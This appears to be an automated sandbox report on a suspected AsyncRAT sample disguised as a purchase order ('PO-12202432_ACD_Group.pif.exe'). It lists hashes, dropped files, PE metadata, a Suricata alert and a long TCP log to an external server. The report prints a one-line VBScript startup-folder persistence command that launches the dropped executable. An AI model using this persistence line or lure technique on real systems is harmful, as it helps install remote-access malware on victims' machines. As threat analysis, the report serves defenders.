                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.xg.................`..........2~... ........@.. ....................................`..................................}..J.......~............................................................................ ............... ..H............text...8^... ...`.................. ..`.rsrc...~............b..............@..@.reloc...............h..............@..B.................~......H........D...9...........................................................0..]........d+>.%-.+;.-.+.+7+8Y.-.+5+6.,..X+2+3+42..,.r...p..(....(....(....*.+..+..+..+..+..+..+..+..+......( ...*..( ...*B+..+.*.+.(....+.....0..R.......+C+D~5...%-.&~4.....p...s!...%.5...~6...%-.&~4.....q...s"...%.6...+.*.+..+.(...++....s#...%(.....+.u....r1..p .......+.+.*o$...+.o%...+.o&...+...+.&*(....+..0..........8....-.rE..p8....z8....-.rQ..p8....z8....8....8.....8....8....8..........XoK....,...

                                                        C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs

                                                        Download File
                                                        Process:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):95
                                                        Entropy (8bit):4.834234199155982
                                                        Encrypted:false
                                                        SSDEEP:3:FER/n0eFHHoUkh4EaKC5fmVhRt0dinn:FER/lFHI9aZ5fmV3t0din
                                                        MD5:E5B1EDE78023372737C1B237DE79C923
                                                        SHA1:41C0C32357716734A7218D3905291EE7DD8289E6
                                                        SHA-256:DB9DD5EC3837B863774EE122EFC88BC2BCA8894480AB5E922F82AB60ADBF9307
                                                        SHA-512:CE9AFCAEF7E8FAE5D523ABDB817160D9319F0FA4045B805713D7A17E62462D48FE853B6D9081DAD6E01305F624E714A4BE0E88010F465A14647F0B785A183AC7
                                                        Malicious:true
                                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"""

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.516192210902329
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:PO-12202432_ACD_Group.pif.exe
                                                        File size:27'136 bytes
                                                        MD5:95bec6594e293a42f4abb049ea7e81db
                                                        SHA1:36ece8150f0619fc81bbf92bd840cad252bf1aea
                                                        SHA256:43057c1f8e32c29342cfb790c692c291f33526f9be1380758b9c7c42344a5948
                                                        SHA512:51989412f10aa223e52190587ebf20d0ef447c96d75b9c1d6592db9c1814d9f56c213cf4b2ad1543d5fc5f20a775d0db55820d5725a88ef983c454020e6a68c4
                                                        SSDEEP:384:RTo2ZKanPS/jKkWS+72x+oVQ4ZHiYzfmP4a0fIMbRodF5YHqZlEOmWVYvZ:omsz+72x+qQUicfFfdE0AiB
                                                        TLSH:C7C26B6CC3D81A62CBFE5F3A98F55340877AFB0EB99BE75F088435CA5E027A4445071A
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.xg.................`..........2~... ........@.. ....................................`................................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x407e32
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6778044F [Fri Jan 3 15:37:51 2025 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x7de80x4a.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x57e.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x5e380x6000209c320cd40e1081977ee08e6bed8a75False0.507568359375data5.6830361681553905IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x80000x57e0x600ba933dc11f614b448d59b20e0df9569fFalse0.419921875data4.046378908802311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xa0000xc0x200f8fc6b4d2a42baf72ffb6180102cd58fFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0x805c0x2fcdata0.43717277486910994
                                                        RT_MANIFEST0x83940x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2025-01-09T18:57:13.558600+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert1193.187.91.21850787192.168.2.549710TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 9, 2025 18:56:53.790504932 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:53.790544033 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:53.790611029 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:53.801014900 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:53.801032066 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.505681038 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.505774975 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.509419918 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.509433031 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.509835958 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.552659988 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.595333099 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.731884956 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.731911898 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.731921911 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.732076883 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.732100964 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.781279087 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.819536924 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.819547892 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.819670916 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.819756985 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.819766998 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.819820881 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.820635080 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.820643902 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.820712090 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.821516991 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.821527004 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.821588039 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.860348940 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.860361099 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.860471010 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.911633015 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.911643028 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.911792994 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.912336111 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.912419081 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.913217068 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.913284063 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.913290024 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.913326025 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.913355112 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.913363934 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.914128065 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.914186954 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.914963007 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.915024996 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.948509932 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.948662043 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.949064016 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:54.949151039 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:54.999911070 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.000102043 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.000438929 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.000500917 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.000922918 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.000965118 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.000981092 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.000997066 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.001017094 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.001038074 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.001733065 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.001805067 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.001815081 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.001853943 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.001884937 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.001893997 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.002665997 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.002739906 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.003359079 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.003432035 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.003698111 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.003760099 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.004354000 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.004417896 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.007076979 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.007149935 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.037005901 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.037085056 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.037484884 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.037544012 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.037626982 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.037663937 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.037678003 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.037687063 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.037715912 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.037725925 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.088712931 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.088798046 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.088876963 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.088927984 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.089030981 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.089076042 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.089085102 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.089103937 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.089121103 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.089139938 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.089484930 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.089534998 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.089550972 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.089559078 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.089574099 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.089605093 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.089977026 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.090037107 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.090310097 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.090349913 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.090367079 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.090373993 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.090401888 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.090411901 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.091135025 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.091216087 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.091299057 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.091376066 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.091437101 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.091514111 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.125477076 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.125562906 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.125585079 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.125605106 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.125633001 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.125710011 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.125763893 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.125879049 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.126066923 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.126166105 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.176821947 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.176889896 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.176961899 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.176961899 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.176974058 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.177037001 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.177180052 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.177272081 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.177469015 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.177531958 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.177618027 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.177761078 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.177923918 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.177992105 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.178195000 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.178297997 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.178451061 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.178515911 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.178597927 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.178690910 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.178693056 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.178720951 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.178765059 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.178765059 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.182112932 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.182210922 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.182240009 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.182248116 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.182271004 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.183284044 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.213848114 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.213902950 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.214025021 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.214025021 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.214057922 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.214092970 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.214135885 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.214135885 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.214145899 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.214245081 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.214306116 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.214314938 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.214365005 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444205046 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444216967 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444255114 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444297075 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444315910 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444344044 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444360018 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444360018 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444370031 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444385052 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444411039 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444411039 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444421053 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444444895 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444459915 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444459915 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444468021 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444514036 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444514036 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444699049 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444775105 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444813967 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444818974 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.444849968 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444849968 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.444945097 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.445075035 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.445127010 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.445194960 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.445358992 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.445482016 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.445483923 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.445509911 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.445561886 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.445561886 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.445624113 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.445780993 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.445811987 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.445817947 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.445842028 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.445878029 CET49704443192.168.2.5209.58.149.225
                                                        Jan 9, 2025 18:56:55.445880890 CET44349704209.58.149.225192.168.2.5
                                                        Jan 9, 2025 18:56:55.445905924 CET44349704209.58.149.225192.168.2.5
